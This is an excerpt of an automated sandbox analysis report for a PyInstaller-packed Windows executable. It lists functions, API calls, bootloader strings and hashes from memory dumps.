Function 00007FF690024A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF690024ABF
GetFileInformationByHandle.KERNEL32 ref: 00007FF690024B21
GetLastError.KERNEL32 ref: 00007FF690024BB2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6900249C4), ref: 00007FF690024BFE

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction ID: fb750d108c2623292a4c426ac6b03a416b45b62ce3830a6e35d10ef0c1786b25
Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction Fuzzy Hash: 6C517822E086419AFB64CF79D4503BD27A5EF48B98F218575DE0D8BB8DDF38D4828740

Function 00007FF690012030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF690012064
SetWindowLongPtrW.USER32 ref: 00007FF690012086
GetWindowLongPtrW.USER32 ref: 00007FF6900120B0
InvalidateRect.USER32 ref: 00007FF6900120D0

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 12af31a49459fafde35b0062c51bb97e609a924e083d0ae66dc763579da81dd5
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 1711E521E0814252FAB69B7AE5442B91292EF8CB88F848171EA4D87B8FCD2CD4E18600

Function 00007FF69001C330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69001C35C
GetCurrentThreadId.KERNEL32 ref: 00007FF69001C36A
GetCurrentProcessId.KERNEL32 ref: 00007FF69001C376
QueryPerformanceCounter.KERNEL32 ref: 00007FF69001C386

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: 9ca3e75ac5f656dd08f6fd25b59cfb02fb4f2395cf019a7a4db2c09b25091ac1
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: D5111822B14B059AEB108B70E8542A933A4FB59758F441E31EA6D86BA8EF78D1988340

Function 00007FF690034E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF690030A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690030AA3

_get_daylight.LIBCMT ref: 00007FF690034F44
_get_daylight.LIBCMT ref: 00007FF690034F55

Strings

?, xrefs: 00007FF690034ED5

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction ID: e1dcb3100f6a0f1517aa93ec2d3608b3295c3d7a10a76c201011125beb336e72
Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction Fuzzy Hash: 3241F612A0868266FF369B35D441B7A6790EF84BA4F144275EE5C8ABDDDF3CE481C700

Function 00007FF69002832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002835E

Part of subcall function 00007FF690029C58: RtlFreeHeap.NTDLL(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69001BEC5), ref: 00007FF69002837C

Strings

C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe, xrefs: 00007FF69002836A

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
API String ID: 3580290477-991927476
Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction ID: 323837247eeec7fd44fbcaff1b2c024b14c6b0abaa7082e72304a3d6f93d6ce2
Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction Fuzzy Hash: 9F417F3AA0DB56A6EB34DF39A4810FD2794EF45B94B554075EA4E87B8DDF3CE4828300

Function 00007FF69002F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002F916

Part of subcall function 00007FF69002E8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E908

Strings

:, xrefs: 00007FF69002F956
., xrefs: 00007FF69002F967

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction ID: 5a2d6bfc6d16ccbdcb5e4487e37e3528000c87e49f01a57fc38edfa98d1e5d95
Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction Fuzzy Hash: 17414B22F08752A8FB21DBB998512BD26B4EF14798F540079DE4DA7B8DEF38D4878310

Function 00007FF69002BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF69002C05F
GetLastError.KERNEL32 ref: 00007FF69002C081

Strings

U, xrefs: 00007FF69002C00B

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: 18226b86f7da60d0ba9c0e6db2c843782155f68460b394313a35138751256fd4
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: 1541B122A18A8595DB60CF39E8447A97761FB98794F904131EE4DC7B88EF7CD442CB40

Function 00007FF69002E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF69002E95A

Strings

:, xrefs: 00007FF69002E91E

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
Instruction ID: c604af56524368840ac1af1f69b0d6af01d69526383a0a9e493e24773caff9a6
Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
Instruction Fuzzy Hash: 9721B422B086C1D1EB74DB29D04427E77A2FB88B44F554076DA8D83789DF7CE986C741

Function 00007FF69001F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF69001F0B8
RaiseException.KERNEL32 ref: 00007FF69001F0F9

Strings

csm, xrefs: 00007FF69001F0E6

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 65a421ec1a41d30ea9004b64c226a5e4f7d4b14b023dd00de55671022b1f262a
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: 8A115B36618B8492EB628B25F44026AB7E1FB8CB98F184270EF8D47769DF3CD5518B00

Function 00007FF69002FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002FA7C
GetDriveTypeW.KERNEL32 ref: 00007FF69002FABC

Strings

:, xrefs: 00007FF69002FAA5

Memory Dump Source

Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 80721f3ce00255171da745d508e03c87169964b126ac9a0681d06fc091adc004
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: E101A261A1C243A6FB30AF78946127E23A0EF58788F800075D64DC6799DF7CE506CA15

Analysis Process: CC11.tmp.ctx.exePID: 4160, Parent PID: 7140COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	828
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF690011000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF690013820
MEI, xrefs: 00007FF69001374E
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6900137EF
pyi-runtime-tmpdir, xrefs: 00007FF6900135D3
Failed to start splash screen!, xrefs: 00007FF690013933
pyi-contents-directory, xrefs: 00007FF6900135F8
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF69001378C
pkg, xrefs: 00007FF6900137CF
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF690013A31
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF690013653
pyi-disable-windowed-traceback, xrefs: 00007FF69001361D
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6900136FC
Could not create temporary directory!, xrefs: 00007FF690013838
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF690013A12
_MEIPASS2, xrefs: 00007FF6900136A2, 00007FF6900136AE, 00007FF6900139AC
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF69001391A
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF690013905
Failed to convert DLL search path!, xrefs: 00007FF6900138A3

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
Instruction ID: 474b030fdf745ab564fdf7fb3f6c5f80cb3659e2ab9b4b01cf09ef63c0e4f6ba
Opcode Fuzzy Hash: bd5132a996e21c3b955ef89ab5ecb1a2b08bd885b3b328e7f6b5000dab4d0f26
Instruction Fuzzy Hash: 75F17C21A0CA82B1EBB9DB31D5542F96661EF44788F8440B2EA5DC33DEEF2CE559D300

Function 00007FF690034F10 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF690034F55

Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC

Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

Part of subcall function 00007FF690029C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C19
Part of subcall function 00007FF690029C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF690029BEF,?,?,?,?,?,00007FF690029ADA), ref: 00007FF690029C3E

_get_daylight.LIBCMT ref: 00007FF690034F44

Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C

_get_daylight.LIBCMT ref: 00007FF6900351BA
_get_daylight.LIBCMT ref: 00007FF6900351CB
_get_daylight.LIBCMT ref: 00007FF6900351DC
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203

Strings

Eastern Summer Time, xrefs: 00007FF6900352C1
Eastern Standard Time, xrefs: 00007FF6900352A9

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction ID: 8ee1f5a5fa18e315eaa4c09cd2f6a4207f63ac7a416a9c4f7edcc726ab730b38
Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
Instruction Fuzzy Hash: EFD1CD26E08242A6EB35AF36D850ABD63A1EF89784F444076EA0DC7B9DDF3CE441C740

Function 00007FF690035C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900359E9
Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690035A67
Part of subcall function 00007FF6900359A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF690035AB8

CreateFileW.KERNELBASE ref: 00007FF690035D7A
CreateFileW.KERNEL32 ref: 00007FF690035DCA
GetLastError.KERNEL32 ref: 00007FF690035DFA
GetFileType.KERNELBASE ref: 00007FF690035E0F
GetLastError.KERNEL32 ref: 00007FF690035E19
CloseHandle.KERNEL32 ref: 00007FF690035E4C
CloseHandle.KERNEL32 ref: 00007FF690035FAF
CreateFileW.KERNEL32 ref: 00007FF690035FE4
GetLastError.KERNEL32 ref: 00007FF690035FF3

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: 508367570384a89883b3ecbd5e794a836ca73a2b604927ea56c7b07e99bd5283
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: 17C1BF36B28A4196EB25CF79C490AAD3761FB49BA8B011275DF2ED77A8CF38D151C300

Function 00007FF69003518C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6900351BA

Part of subcall function 00007FF690034908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69003491C

_get_daylight.LIBCMT ref: 00007FF6900351CB

Part of subcall function 00007FF6900348A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348BC

_get_daylight.LIBCMT ref: 00007FF6900351DC

Part of subcall function 00007FF6900348D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6900348EC

Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69003541C), ref: 00007FF690035203

Strings

Eastern Summer Time, xrefs: 00007FF6900352C1
Eastern Standard Time, xrefs: 00007FF6900352A9

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction ID: 7d8dc545302b253465d7f88f5baa9e1cf3cbb23d1cbadd4d9b2b296aa1b6f2ab
Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
Instruction Fuzzy Hash: 5F517A36E18642A6E731DF32E8909A977A0FB49784F4045B5EA0DC77AADF3CE441C740

Function 00007FF6900185A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6900185D3
FindClose.KERNELBASE ref: 00007FF6900185E2

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 5fed89063433a5787eb8b26b0daf6557e4d07e8364db9dd4f400cd070d38da90
